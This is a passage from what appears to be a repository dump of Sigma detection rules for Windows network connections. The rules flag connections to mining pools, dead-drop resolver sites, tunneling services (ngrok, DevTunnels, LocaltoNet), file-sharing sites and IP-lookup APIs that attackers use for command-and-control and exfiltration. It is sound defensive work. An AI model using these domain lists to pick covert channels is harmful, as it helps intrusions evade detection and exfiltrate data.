'fr-upx.miningocean.org'\n            - 'fr-zephyr.miningocean.org'\n            - 'fr.minexmr.com'\n            - 'hellominer.com'\n            - 'herominers.com'\n            - 'hk-aipg.miningocean.org'\n            - 'hk-dynex.miningocean.org'\n            - 'hk-neurai.miningocean.org'\n            - 'hk-qrl.miningocean.org'\n            - 'hk-upx.miningocean.org'\n            - 'hk-zephyr.miningocean.org'\n            - 'huadong1-aeon.ppxxmr.com'\n            - 'iwanttoearn.money'\n            - 'jw-js1.ppxxmr.com'\n            - 'koto-pool.work'\n            - 'lhr.nbminer.com'\n            - 'lhr3.nbminer.com'\n            - 'linux.monerpool.org'\n            - 'lokiturtle.herominers.com'\n            - 'luckpool.net'\n            - 'masari.miner.rocks'\n            - 'mine.c3pool.com'\n            - 'mine.moneropool.com'\n            - 'mine.ppxxmr.com'\n            - 'mine.zpool.ca'\n            - 'mine1.ppxxmr.com'\n            - 'minemonero.gq'\n            - 'miner.ppxxmr.com'\n            - 'miner.rocks'\n            - 'minercircle.com'\n            - 'minergate.com'\n            - 'minerpool.pw'\n            - 'minerrocks.com'\n            - 'miners.pro'\n            - 'minerxmr.ru'\n            - 'minexmr.cn'\n            - 'minexmr.com'\n            - 'mining-help.ru'\n            - 'miningpoolhub.com'\n            - 'mixpools.org'\n            - 'moner.monerpool.org'\n            - 'moner1min.monerpool.org'\n            - 'monero-master.crypto-pool.fr'\n            - 'monero.crypto-pool.fr'\n            - 'monero.hashvault.pro'\n            - 'monero.herominers.com'\n            - 'monero.lindon-pool.win'\n            - 'monero.miners.pro'\n            - 'monero.riefly.id'\n            - 'monero.us.to'\n            - 'monerocean.stream'\n            - 'monerogb.com'\n            - 'monerohash.com'\n            - 'moneroocean.stream'\n            - 'moneropool.com'\n            - 'moneropool.nl'\n            - 'monerorx.com'\n            - 'monerpool.org'\n            - 'moriaxmr.com'\n            - 'mro.pool.minergate.com'\n            - 'multipool.us'\n            - 'myxmr.pw'\n            - 'na.luckpool.net'\n            - 'nanopool.org'\n            - 'nbminer.com'\n            - 'node3.luckpool.net'\n            - 'noobxmr.com'\n            - 'pangolinminer.comgandalph3000.com'\n            - 'pool.4i7i.com'\n            - 'pool.armornetwork.org'\n            - 'pool.cortins.tk'\n            - 'pool.gntl.co.uk'\n            - 'pool.hashvault.pro'\n            - 'pool.minergate.com'\n            - 'pool.minexmr.com'\n            - 'pool.monero.hashvault.pro'\n            - 'pool.ppxxmr.com'\n            - 'pool.somec.cc'\n            - 'pool.support'\n            - 'pool.supportxmr.com'\n            - 'pool.usa-138.com'\n            - 'pool.xmr.pt'\n            - 'pool.xmrfast.com'\n            - 'pool2.armornetwork.org'\n            - 'poolchange.ppxxmr.com'\n            - 'pooldd.com'\n            - 'poolmining.org'\n            - 'poolto.be'\n            - 'ppxvip1.ppxxmr.com'\n            - 'ppxxmr.com'\n            - 'prohash.net'\n            - 'r.twotouchauthentication.online'\n            - 'randomx.xmrig.com'\n            - 'ratchetmining.com'\n            - 'seed.emercoin.com'\n            - 'seed.emercoin.net'\n            - 'seed.emergate.net'\n            - 'seed1.joulecoin.org'\n            - 'seed2.joulecoin.org'\n            - 'seed3.joulecoin.org'\n            - 'seed4.joulecoin.org'\n            - 'seed5.joulecoin.org'\n            - 'seed6.joulecoin.org'\n            - 'seed7.joulecoin.org'\n            - 'seed8.joulecoin.org'\n            - 'sg-aipg.miningocean.org'\n            - 'sg-dynex.miningocean.org'\n            - 'sg-neurai.miningocean.org'\n            - 'sg-qrl.miningocean.org'\n            - 'sg-upx.miningocean.org'\n            - 'sg-zephyr.miningocean.org'\n            - 'sg.minexmr.com'\n            - 'sheepman.mine.bz'\n            - 'siamining.com'\n            - 'sumokoin.minerrocks.com'\n            - 'supportxmr.com'\n            - 'suprnova.cc'\n            - 'teracycle.net'\n            - 'trtl.cnpool.cc'\n            - 'trtl.pool.mine2gether.com'\n            - 'turtle.miner.rocks'\n            - 'us-aipg.miningocean.org'\n            - 'us-dynex.miningocean.org'\n            - 'us-neurai.miningocean.org'\n            - 'us-west.minexmr.com'\n            - 'us-zephyr.miningocean.org'\n            - 'usxmrpool.com'\n            - 'viaxmr.com'\n            - 'webservicepag.webhop.net'\n            - 'xiazai.monerpool.org'\n            - 'xiazai1.monerpool.org'\n            - 'xmc.pool.minergate.com'\n            - 'xmo.pool.minergate.com'\n            - 'xmr-asia1.nanopool.org'\n            - 'xmr-au1.nanopool.org'\n            - 'xmr-eu1.nanopool.org'\n            - 'xmr-eu2.nanopool.org'\n            - 'xmr-jp1.nanopool.org'\n            - 'xmr-us-east1.nanopool.org'\n            - 'xmr-us-west1.nanopool.org'\n            - 'xmr-us.suprnova.cc'\n            - 'xmr-usa.dwarfpool.com'\n            - 'xmr.2miners.com'\n            - 'xmr.5b6b7b.ru'\n            - 'xmr.alimabi.cn'\n            - 'xmr.bohemianpool.com'\n            - 'xmr.crypto-pool.fr'\n            - 'xmr.crypto-pool.info'\n            - 'xmr.f2pool.com'\n            - 'xmr.hashcity.org'\n            - 'xmr.hex7e4.ru'\n            - 'xmr.ip28.net'\n            - 'xmr.monerpool.org'\n            - 'xmr.mypool.online'\n            - 'xmr.nanopool.org'\n            - 'xmr.pool.gntl.co.uk'\n            - 'xmr.pool.minergate.com'\n            - 'xmr.poolto.be'\n            - 'xmr.ppxxmr.com'\n            - 'xmr.prohash.net'\n            - 'xmr.simka.pw'\n            - 'xmr.somec.cc'\n            - 'xmr.suprnova.cc'\n            - 'xmr.usa-138.com'\n            - 'xmr.vip.pool.minergate.com'\n            - 'xmr1min.monerpool.org'\n            - 'xmrf.520fjh.org'\n            - 'xmrf.fjhan.club'\n            - 'xmrfast.com'\n            - 'xmrigcc.graef.in'\n            - 'xmrminer.cc'\n            - 'xmrpool.de'\n            - 'xmrpool.eu'\n            - 'xmrpool.me'\n            - 'xmrpool.net'\n            - 'xmrpool.xyz'\n            - 'xx11m.monerpool.org'\n            - 'xx11mv2.monerpool.org'\n            - 'xxx.hex7e4.ru'\n            - 'zarabotaibitok.ru'\n            - 'zer0day.ru'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_dead_drop_resolvers.yml",
    "content": "title: New Connection Initiated To Potential Dead Drop Resolver Domain\nid: 297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7\nrelated:\n    - id: d7b09985-95a3-44be-8450-b6eadf49833e\n      type: obsolete\nstatus: test\ndescription: |\n    Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.\n    In this context attackers leverage known websites such as \"facebook\", \"youtube\", etc. In order to pass through undetected.\nreferences:\n    - https://web.archive.org/web/20220830134315/https://content.fireeye.com/apt-41/rpt-apt41/\n    - https://securelist.com/the-tetrade-brazilian-banking-malware/97779/\n    - https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html\n    - https://github.com/kleiton0x00/RedditC2\n    - https://twitter.com/kleiton0x7e/status/1600567316810551296\n    - https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al\nauthor: Sorina Ionescu, X__Junior (Nextron Systems)\ndate: 2022-08-17\nmodified: 2024-10-21\ntags:\n    - attack.command-and-control\n    - attack.t1102\n    - attack.t1102.001\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith:\n            - '.t.me'\n            - '4shared.com'\n            - 'abuse.ch'\n            - 'anonfiles.com'\n            - 'cdn.discordapp.com'\n            - 'cloudflare.com'\n            - 'ddns.net'\n            - 'discord.com'\n            - 'docs.google.com'\n            - 'drive.google.com'\n            - 'dropbox.com'\n            - 'dropmefiles.com'\n            - 'facebook.com'\n            - 'feeds.rapidfeeds.com'\n            - 'fotolog.com'\n            - 'ghostbin.co/'\n            - 'githubusercontent.com'\n            - 'gofile.io'\n            - 'hastebin.com'\n            - 'imgur.com'\n            - 'livejournal.com'\n            - 'mediafire.com'\n            - 'mega.co.nz'\n            - 'mega.nz'\n            - 'onedrive.com'\n            - 'pages.dev'\n            - 'paste.ee'\n            - 'pastebin.com'\n            - 'pastebin.pl'\n            - 'pastetext.net'\n            - 'pixeldrain.com'\n            - 'privatlab.com'\n            - 'privatlab.net'\n            - 'reddit.com'\n            - 'send.exploit.in'\n            - 'sendspace.com'\n            - 'steamcommunity.com'\n            - 'storage.googleapis.com'\n            - 'technet.microsoft.com'\n            - 'temp.sh'\n            - 'transfer.sh'\n            - 'trycloudflare.com'\n            - 'twitter.com'\n            - 'ufile.io'\n            - 'vimeo.com'\n            - 'w3spaces.com'\n            - 'wetransfer.com'\n            - 'workers.dev'\n            - 'youtube.com'\n    # Note: Add/Remove browsers/applications that you don't use or those that have custom install locations\n    # Note: To avoid complex conditions the filters for some apps are generic by name only. A custom tuning is recommended for best results\n    filter_main_chrome:\n        Image:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_main_chrome_appdata:\n        Image|startswith: 'C:\\Users\\'\n        Image|endswith: '\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe'\n    filter_main_firefox:\n        Image:\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_main_firefox_appdata:\n        Image|startswith: 'C:\\Users\\'\n        Image|endswith: '\\AppData\\Local\\Mozilla Firefox\\firefox.exe'\n    filter_main_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_main_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n              - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_main_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_main_safari:\n        Image|contains:\n            - 'C:\\Program Files (x86)\\Safari\\'\n            - 'C:\\Program Files\\Safari\\'\n        Image|endswith: '\\safari.exe'\n    filter_main_defender:\n        Image|contains:\n            - 'C:\\Program Files\\Windows Defender Advanced Threat Protection\\'\n            - 'C:\\Program Files\\Windows Defender\\'\n            - 'C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n        Image|endswith:\n            - '\\MsMpEng.exe' # Microsoft Defender executable\n            - '\\MsSense.exe' # Windows Defender Advanced Threat Protection Service Executable\n    filter_main_prtg:\n        # Paessler's PRTG Network Monitor\n        Image|endswith:\n            - 'C:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Probe.exe'\n            - 'C:\\Program Files\\PRTG Network Monitor\\PRTG Probe.exe'\n    filter_main_brave:\n        Image|startswith: 'C:\\Program Files\\BraveSoftware\\'\n        Image|endswith: '\\brave.exe'\n    filter_main_maxthon:\n        Image|contains: '\\AppData\\Local\\Maxthon\\'\n        Image|endswith: '\\maxthon.exe'\n    filter_main_opera:\n        Image|contains: '\\AppData\\Local\\Programs\\Opera\\'\n        Image|endswith: '\\opera.exe'\n    filter_main_seamonkey:\n        Image|startswith:\n            - 'C:\\Program Files\\SeaMonkey\\'\n            - 'C:\\Program Files (x86)\\SeaMonkey\\'\n        Image|endswith: '\\seamonkey.exe'\n    filter_main_vivaldi:\n        Image|contains: '\\AppData\\Local\\Vivaldi\\'\n        Image|endswith: '\\vivaldi.exe'\n    filter_main_whale:\n        Image|startswith:\n            - 'C:\\Program Files\\Naver\\Naver Whale\\'\n            - 'C:\\Program Files (x86)\\Naver\\Naver Whale\\'\n        Image|endswith: '\\whale.exe'\n    # Note: The TOR browser shouldn't be something you allow in your corporate network.\n    # filter_main_tor:\n    #     Image|contains: '\\Tor Browser\\'\n    filter_main_whaterfox:\n        Image|startswith:\n            - 'C:\\Program Files\\Waterfox\\'\n            - 'C:\\Program Files (x86)\\Waterfox\\'\n        Image|endswith: '\\Waterfox.exe'\n    filter_main_midori:\n        Image|contains: '\\AppData\\Local\\Programs\\midori-ng\\'\n        Image|endswith: '\\Midori Next Generation.exe'\n    filter_main_slimbrowser:\n        Image|startswith:\n            - 'C:\\Program Files\\SlimBrowser\\'\n            - 'C:\\Program Files (x86)\\SlimBrowser\\'\n        Image|endswith: '\\slimbrowser.exe'\n    filter_main_flock:\n        Image|contains: '\\AppData\\Local\\Flock\\'\n        Image|endswith: '\\Flock.exe'\n    filter_main_phoebe:\n        Image|contains: '\\AppData\\Local\\Phoebe\\'\n        Image|endswith: '\\Phoebe.exe'\n    filter_main_falkon:\n        Image|startswith:\n            - 'C:\\Program Files\\Falkon\\'\n            - 'C:\\Program Files (x86)\\Falkon\\'\n        Image|endswith: '\\falkon.exe'\n    filter_main_qtweb:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\QtWeb\\'\n            - 'C:\\Program Files\\QtWeb\\'\n        Image|endswith: '\\QtWeb.exe'\n    filter_main_avant:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Avant Browser\\'\n            - 'C:\\Program Files\\Avant Browser\\'\n        Image|endswith: '\\avant.exe'\n    filter_main_whatsapp:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\WindowsApps\\'\n            - 'C:\\Program Files\\WindowsApps\\'\n        Image|endswith: '\\WhatsApp.exe'\n        DestinationHostname|endswith: 'facebook.com'\n    filter_main_telegram:\n        Image|contains: '\\AppData\\Roaming\\Telegram Desktop\\'\n        Image|endswith: '\\Telegram.exe'\n        DestinationHostname|endswith: '.t.me'\n    filter_main_onedrive:\n        Image|contains: '\\AppData\\Local\\Microsoft\\OneDrive\\'\n        Image|endswith: '\\OneDrive.exe'\n        DestinationHostname|endswith: 'onedrive.com'\n    filter_main_dropbox:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Dropbox\\Client\\'\n            - 'C:\\Program Files\\Dropbox\\Client\\'\n        Image|endswith:\n            - '\\Dropbox.exe'\n            - '\\DropboxInstaller.exe'\n        DestinationHostname|endswith: 'dropbox.com'\n    filter_main_mega:\n        Image|endswith:\n            # Note: This is a basic/best effort filter in order to avoid FP with the MEGA installer and executable.\n            #       In practice please apply exact path to avoid basic path bypass techniques.\n            - '\\MEGAsync.exe'\n            - '\\MEGAsyncSetup32_*RC.exe' # Beta versions\n            - '\\MEGAsyncSetup32.exe' # Installers 32bit\n            - '\\MEGAsyncSetup64.exe' # Installers 64bit\n            - '\\MEGAupdater.exe'\n        DestinationHostname|endswith:\n            - 'mega.co.nz'\n            - 'mega.nz'\n    filter_main_googledrive:\n        Image|contains:\n            - 'C:\\Program Files\\Google\\Drive File Stream\\'\n            - 'C:\\Program Files (x86)\\Google\\Drive File Stream\\'\n        Image|endswith: 'GoogleDriveFS.exe'\n        DestinationHostname|endswith: 'drive.google.com'\n    filter_main_discord:\n        Image|contains: '\\AppData\\Local\\Discord\\'\n        Image|endswith: '\\Discord.exe'\n        DestinationHostname|endswith:\n            - 'discord.com'\n            - 'cdn.discordapp.com'\n    filter_main_null:\n        Image: null\n    filter_main_empty:\n        Image: ''\n    # filter_optional_qlik:\n    #     Image|endswith: '\\Engine.exe' # Process from qlik.com app\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender.\n    - Ninite contacting githubusercontent.com\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_devtunnels.yml",
    "content": "title: Network Connection Initiated To DevTunnels Domain\nid: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4\nrelated:\n    - id: 4b657234-038e-4ad5-997c-4be42340bce4 # Net Connection VsCode\n      type: similar\n    - id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 # DNS VsCode\n      type: similar\n    - id: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b # DNS DevTunnels\n      type: similar\nstatus: test\ndescription: |\n    Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\nreferences:\n    - https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2\n    - https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security\n    - https://cydefops.com/devtunnels-unleashed\nauthor: Kamran Saifullah\ndate: 2023-11-20\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.t1567.001\n    - attack.t1572\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith: '.devtunnels.ms'\n    condition: selection\nfalsepositives:\n    - Legitimate use of Devtunnels will also trigger this.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_dropbox_api.yml",
    "content": "title: Suspicious Dropbox API Usage\nid: 25eabf56-22f0-4915-a1ed-056b8dae0a68\nstatus: test\ndescription: Detects an executable that isn't dropbox but communicates with the Dropbox API\nreferences:\n    - https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb\n    - https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-04-20\ntags:\n    - attack.command-and-control\n    - attack.exfiltration\n    - attack.t1105\n    - attack.t1567.002\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith:\n            - 'api.dropboxapi.com'\n            - 'content.dropboxapi.com'\n    filter_main_legit_dropbox:\n        # Note: It's better to add a specific path to the exact location(s) where dropbox is installed\n        Image|contains: '\\Dropbox'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate use of the API with a tool that the author wasn't aware of\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_external_ip_lookup.yml",
    "content": "title: Suspicious Network Connection to IP Lookup Service APIs\nid: edf3485d-dac4-4d50-90e4-b0e5813f7e60\nrelated:\n    - id: ec82e2a5-81ea-4211-a1f8-37a0286df2c2\n      type: derived\nstatus: test\ndescription: Detects external IP address lookups by non-browser processes via services such as \"api.ipify.org\". This could be indicative of potential post compromise internet test activity.\nreferences:\n    - https://github.com/rsp/scripts/blob/c8bb272d68164a9836e4f273d8f924927f39b8c6/externalip-benchmark.md\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a\n    - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\n    - https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html\nauthor: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-24\nmodified: 2024-03-22\ntags:\n    - attack.discovery\n    - attack.t1016\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        - DestinationHostname:\n              - 'www.ip.cn'\n              - 'l2.io'\n        - DestinationHostname|contains:\n              - 'api.2ip.ua'\n              - 'api.bigdatacloud.net'\n              - 'api.ipify.org'\n              - 'bot.whatismyipaddress.com'\n              - 'canireachthe.net'\n              - 'checkip.amazonaws.com'\n              - 'checkip.dyndns.org'\n              - 'curlmyip.com'\n              - 'db-ip.com'\n              - 'edns.ip-api.com'\n              - 'eth0.me'\n              - 'freegeoip.app'\n              - 'geoipy.com'\n              - 'getip.pro'\n              - 'icanhazip.com'\n              - 'ident.me'\n              - 'ifconfig.io'\n              - 'ifconfig.me'\n              - 'ip-api.com'\n              - 'ip.360.cn'\n              - 'ip.anysrc.net'\n              - 'ip.taobao.com'\n              - 'ip.tyk.nu'\n              - 'ipaddressworld.com'\n              - 'ipapi.co'\n              - 'ipconfig.io'\n              - 'ipecho.net'\n              - 'ipinfo.io'\n              - 'ipip.net'\n              - 'ipof.in'\n              - 'ipv4.icanhazip.com'\n              - 'ipv4bot.whatismyipaddress.com'\n              - 'ipv6-test.com'\n              - 'ipwho.is'\n              - 'jsonip.com'\n              - 'myexternalip.com'\n              - 'seeip.org'\n              - 'wgetip.com'\n              - 'whatismyip.akamai.com'\n              - 'whois.pconline.com.cn'\n              - 'wtfismyip.com'\n    filter_optional_brave:\n        Image|endswith: '\\brave.exe'\n    filter_optional_chrome:\n        Image:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_firefox:\n        Image:\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_optional_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_optional_maxthon:\n        Image|endswith: '\\maxthon.exe'\n    filter_optional_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n              - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_optional_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_optional_opera:\n        Image|endswith: '\\opera.exe'\n    filter_optional_safari:\n        Image|endswith: '\\safari.exe'\n    filter_optional_seamonkey:\n        Image|endswith: '\\seamonkey.exe'\n    filter_optional_vivaldi:\n        Image|endswith: '\\vivaldi.exe'\n    filter_optional_whale:\n        Image|endswith: '\\whale.exe'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate use of the external websites for troubleshooting or network monitoring\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_google_api_non_browser_access.yml",
    "content": "title: Suspicious Non-Browser Network Communication With Google API\nid: 7e9cf7b6-e827-11ed-a05b-0242ac120003\nstatus: experimental\ndescription: |\n    Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)\nreferences:\n    - https://github.com/looCiprian/GC2-sheet\n    - https://youtu.be/n2dFlSaBBKo\n    - https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf\n    - https://www.tanium.com/blog/apt41-deploys-google-gc2-for-attacks-cyber-threat-intelligence-roundup/\n    - https://www.bleepingcomputer.com/news/security/hackers-abuse-google-command-and-control-red-team-tool-in-attacks/\nauthor: Gavin Knapp\ndate: 2023-05-01\nmodified: 2025-02-22\ntags:\n    - attack.command-and-control\n    - attack.t1102\nlogsource:\n    product: windows\n    category: network_connection\ndetection:\n    selection:\n        DestinationHostname|contains:\n            # Note: Please add additional google API related domains that might be abused.\n            - 'drive.googleapis.com'\n            - 'oauth2.googleapis.com'\n            - 'sheets.googleapis.com'\n            - 'www.googleapis.com'\n    filter_optional_brave:\n        Image|endswith: '\\brave.exe'\n    filter_optional_chrome:\n        Image|endswith:\n            - ':\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - ':\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_google_drive:\n        Image|contains: ':\\Program Files\\Google\\Drive File Stream\\'\n        Image|endswith: '\\GoogleDriveFS.exe'\n    filter_optional_firefox:\n        Image|endswith:\n            - ':\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - ':\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_optional_ie:\n        Image|endswith:\n            - ':\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - ':\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_optional_maxthon:\n        Image|endswith: '\\maxthon.exe'\n    filter_optional_edge_1:\n        - Image|contains: ':\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith:\n              - ':\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - ':\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n              - '\\WindowsApps\\MicrosoftEdge.exe'\n    filter_optional_edge_2:\n        Image|contains:\n            - ':\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - ':\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_optional_opera:\n        Image|endswith: '\\opera.exe'\n    filter_optional_safari:\n        Image|endswith: '\\safari.exe'\n    filter_optional_seamonkey:\n        Image|endswith: '\\seamonkey.exe'\n    filter_optional_vivaldi:\n        Image|endswith: '\\vivaldi.exe'\n    filter_optional_whale:\n        Image|endswith: '\\whale.exe'\n    filter_optional_googleupdate:\n        Image|endswith: '\\GoogleUpdate.exe'\n    filter_optional_outlook_exe:\n        Image|endswith: '\\outlook.exe'\n    filter_main_null:\n        Image: null\n    filter_main_empty:\n        Image: ''\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Legitimate applications communicating with the \"googleapis.com\" endpoints that are not already in the exclusion list. This is environmental dependent and requires further testing and tuning.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_localtonet_tunnel.yml",
    "content": "title: Communication To LocaltoNet Tunneling Service Initiated\nid: 3ab65069-d82a-4d44-a759-466661a082d1\nstatus: test\ndescription: |\n    Detects an executable initiating a network connection to \"LocaltoNet\" tunneling sub-domains.\n    LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.\n    Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.\nreferences:\n    - https://localtonet.com/documents/supported-tunnels\n    - https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications\nauthor: Andreas Braathen (mnemonic.io)\ndate: 2024-06-17\ntags:\n    - attack.command-and-control\n    - attack.t1572\n    - attack.t1090\n    - attack.t1102\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        DestinationHostname|endswith:\n            - '.localto.net'\n            - '.localtonet.com'\n        Initiated: 'true'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the LocaltoNet service.\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_mega_nz.yml",
    "content": "title: Network Connection Initiated To Mega.nz\nid: fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4\nstatus: test\ndescription: |\n    Detects a network connection initiated by a binary to \"api.mega.co.nz\".\n    Attackers were seen abusing file sharing websites similar to \"mega.nz\" in order to upload/download additional payloads.\nreferences:\n    - https://megatools.megous.com/\n    - https://www.mandiant.com/resources/russian-targeting-gov-business\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-12-06\nmodified: 2024-05-31\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith:\n            - 'mega.co.nz'\n            - 'mega.nz'\n    condition: selection\nfalsepositives:\n    - Legitimate MEGA installers and utilities are expected to communicate with this domain. Exclude hosts that are known to be allowed to use this tool.\nlevel: low\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_ngrok.yml",
    "content": "title: Process Initiated Network Connection To Ngrok Domain\nid: 18249279-932f-45e2-b37a-8925f2597670\nrelated:\n    - id: 1d08ac94-400d-4469-a82f-daee9a908849\n      type: similar\nstatus: test\ndescription: |\n    Detects an executable initiating a network connection to \"ngrok\" domains.\n    Attackers were seen using this \"ngrok\" in order to store their second stage payloads and malware.\n    While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.\nreferences:\n    - https://ngrok.com/\n    - https://ngrok.com/blog-post/new-ngrok-domains\n    - https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/\n    - https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-07-16\nmodified: 2025-07-30\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.t1567\n    - attack.t1572\n    - attack.t1102\nlogsource:\n    category: network_connection\n    product: windows\ndetection:\n    selection:\n        Initiated: 'true'\n        DestinationHostname|endswith:\n            - '.ngrok-free.app'\n            - '.ngrok-free.dev'\n            - '.ngrok.app'\n            - '.ngrok.dev'\n            - '.ngrok.io'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the ngrok service.\n# Note: The level of this rule is related to your internal policy.\nlevel: high\n"
  },
  {
    "path": "rules/windows/network_connection/net_connection_win_domain_ngrok_tunnel.yml",
